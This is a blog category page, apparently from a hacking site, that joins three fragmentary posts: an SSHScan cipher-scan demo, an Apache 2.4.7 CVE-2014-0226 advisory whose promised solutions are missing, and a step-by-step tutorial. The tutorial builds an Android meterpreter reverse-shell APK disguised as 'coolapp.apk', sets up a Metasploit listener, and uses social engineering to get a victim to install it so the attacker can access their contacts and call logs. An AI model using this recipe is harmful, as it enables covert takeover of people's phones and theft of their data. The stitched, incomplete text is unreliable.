Category: Hacker News

Home / Category: Hacker News

Pentester Tools : SSHScan

April 10, 2018 | Hacker News | 2 Comments

    SSHScan is a testing tool that enumerates SSH Ciphers. We Can easily detect weak ciphers by using this . 



Lets tryout SSHScan in BrokenWeb (A Vulnerable machine) hosted locally .

Brokenweb IP : 192.168.3.107

codebreaker@zbox:~$ ./SSHScan/sshscan.py -t 192.168.3.107:22

 In Network Pentesting, Once you detect an SSH port , then try for SSHScan to detect the ciphers. If KEX algoritham is weak then an attacker can easily create a Denial of Service attack on SSH port and hence the target wont be accessible by the anyone at the moment.

GITHUB Link:
https://github.com/evict/SSHScan

Installation :
git clone https://github.com/evict/SSHScan 

 

If your server is running with an apache 2.4.7 , then the chance for being hacked is high . Listing two solutions to solve this issue .

Description:

An attacker able to access a public server status page on a server using a threaded MPM could send a carefully crafted request which could lead to a heap buffer overflow. Note that it is not a default or recommended configuration to have a public accessible server status page.

Proof:

  • Running HTTP service
  • Product HTTPD exists — Apache HTTPD 2.4.7
  • Vulnerable version of product HTTPD found — Apache HTTPD 2.4.7


Vulnerability ID
: apache-httpd-cve-2014-0226

Solution:

Disclaimer: Hacking other devices on Wireless Networks (Wi-Fi) without explicit written permission is illegal, unless you are the legal owner of the devices you want to hack and the wireless network.

Its just a simple Trick. All you need is our dear metasploit, and a bit of social engineering skills.
Here my ip is 192.168.1.33 and the system i am going to hack is of ip 192.168.1.34
Open a terminal(as root-sudo terminator), and put in:
msfvenom -p android/meterpreter/reverse_tcp LHOST=(your lan ip address) LPORT=8080 R > /home/root/coolapp.apk
eg : msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.33 LPORT=8080 R > /home/root/coolapp.apk 
This command should give you a file called coolapp.apk on the desktop. Now we need to set up a listener so that when the target opens the app, we have their android hacked. 😀
Open the metasploit console by typing “msfconsole” & Type : 
use exploit/multi/handler
Hit return and follow as I do 1by1.

set payload android/meterpreter/reverse_tcp

set lhost (your lan ip address)
set lport 8080

Hit enter, Now use some social engineering tricks like sending them a mail or send via  bluetooth to give the file on the desktop titled, coolapp.apk, to someone who will open(click on install>&open) it on their android phone. Once you have given the app and they are about to open it, go back to your metasploit console and type:

exploit
This should open a connection soon with the target android phone where you can access a lot of features of that phone like Contacts,Call log, and many more .

Feel free to comment here if you face any problems .
All the best.